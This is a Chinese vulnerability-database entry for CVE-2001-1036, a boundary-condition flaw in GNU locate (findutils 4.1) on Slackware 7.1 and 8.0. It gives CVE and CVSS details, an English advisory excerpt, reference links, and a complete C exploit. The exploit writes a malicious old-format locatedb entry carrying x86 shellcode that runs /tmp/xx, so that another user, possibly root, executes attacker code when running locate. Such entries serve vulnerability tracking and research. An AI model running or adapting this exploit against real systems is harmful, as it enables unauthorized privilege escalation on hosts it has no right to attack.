Slackware findutils GNU locate权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106455 漏洞类型 未知
发布时间 2001-08-01 更新时间 2005-05-02
CVE编号 CVE-2001-1036 CNNVD-ID CNNVD-200108-173
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/21043
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-173
|漏洞详情
Slackware7.1和8.0上的findutils4.1的GNUlocate存在漏洞。本地用户可以借助原有规格化数据库(locatedb)文件名获取权限,其中包含带有out-of-range偏移的一个条目,该漏洞可能导致locate写入任意内存进程。
|漏洞EXP
source: http://www.securityfocus.com/bid/3127/info

GNU locate is an application that searches file databases for file names that match user-supplied patterns.

A boundary condition error can occur when the program reads database files composed in an "old" format, produced by GNU locate prior to version 4.0 and by Unix versions of locate and find. If an attacker is able to write a malicious entry to a database file used by other users, the attacker could cause arbitrary code to be executed by another user when the user runs the locate program.

It also should be noted that in earlier versions of Slackware(circa 3.5) the file is written by the superuser. 

#include <stdio.h>

char shellcode[] =
   "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
   "\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80"
   "\xe8\xe3\xff\xff\xff/tmp/xx";
char putshell[] =
   "\x14\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c"
   "\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96";

int main(void)
{
   int i;
   int z0=0; int addr=0x0804a970;
   int z1=0; int addr2=-626;
   int z2=0; int addr3=addr+6;
   printf("%s", &addr);
   printf("%s", &addr3);
   printf("%s",shellcode);
   fflush(stdout);
   for(i=46;i<256;i++) putchar('A');
   printf("%s", putshell);
   fflush(stdout);
   putchar(0);
   putchar(30);
   printf("%s", &addr2);
   printf("\x82\x83");
   fflush(stdout);
}
|参考资料

来源:XF
名称:locate-command-execution(6932)
链接:http://xforce.iss.net/static/6932.php
来源:BID
名称:3127
链接:http://www.securityfocus.com/bid/3127
来源:BUGTRAQ
名称:20010801Slackware8.0,7.1Vulnerability:/usr/bin/locate
链接:http://www.securityfocus.com/archive/1/200991
来源:OSVDB
名称:5477
链接:http://www.osvdb.org/5477